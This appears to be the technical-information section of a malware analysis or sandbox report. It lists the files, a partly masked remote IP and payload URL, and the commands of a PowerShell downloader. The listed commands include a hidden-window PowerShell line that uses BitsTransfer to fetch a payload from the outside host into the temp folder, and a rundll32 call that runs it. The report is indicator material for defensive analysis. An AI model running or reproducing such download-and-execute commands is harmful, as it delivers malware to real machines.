Technical Information
- <SYSTEM32>\windowspowershell\v1.0\powershell.exe
- %TEMP%\bit167.tmp
- from %TEMP%\bit167.tmp to %TEMP%\25ywfhdd.l4l
- '18#.#9.69.41':80
- http://18#.#9.69.41/data/e3d71725d748b5b230fceb26c49021cc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://18#.#9.69.41/data/e3d71725d748b5b230f...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile
- '<SYSTEM32>\rundll32.exe' %TEMP%\25ywfhdd.l4l,Start